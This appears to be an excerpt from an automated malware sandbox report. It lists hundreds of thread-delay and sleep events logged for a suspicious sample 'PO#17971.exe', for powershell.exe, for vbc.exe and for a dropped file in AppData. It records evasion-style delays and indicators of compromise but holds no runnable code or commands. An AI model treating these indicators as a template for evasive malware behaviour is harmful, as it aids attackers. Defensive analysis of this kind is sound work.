Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599755
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599531
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599421
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599203
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599093
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598984
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598765
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597999
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597343
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597123
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596905
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596796
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596685
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596356
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596248
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 596009
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595692
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595565
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 595109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594997
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594671
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 594342

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7721	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7493	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 3870	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 5952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 1863
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Window / User API: threadDelayed 7995

Source: C:\Users\user\Desktop\PO#17971.exe TID: 1240	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7212	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6556	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -32281802128991695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -599779s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -599603s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -599483s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -599374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -599250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -599141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -599031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -598906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -598796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -598687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -598578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -598468s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -598359s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -598249s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -598141s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -598000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -597890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -597781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -597672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -597547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -597438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -597313s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -597203s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -597094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -596969s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -596860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -596735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -596610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -596485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -596360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -596235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -596109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -596000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -595891s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -595781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -595672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -595438s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -595328s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -595094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7384	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TZRtlifudvO.exe TID: 7304	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -599875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -599755s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -599640s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -599531s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -599421s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -599312s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -599203s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -599093s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -598984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -598875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -598765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -598656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -598547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -598437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -598328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -598219s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -598109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597999s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597123s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -597015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -596905s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -596796s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -596685s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -596577s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -596468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -596356s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -596248s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -596140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -596009s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -595692s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -595565s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -595437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -595328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -595218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -595109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -594997s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -594890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -594781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -594671s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -594562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -594453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 7684	Thread sleep time: -594342s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO#17971.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599779	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599603	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599483	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598141	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Thread delayed: delay time: 597672	Jump to behavior
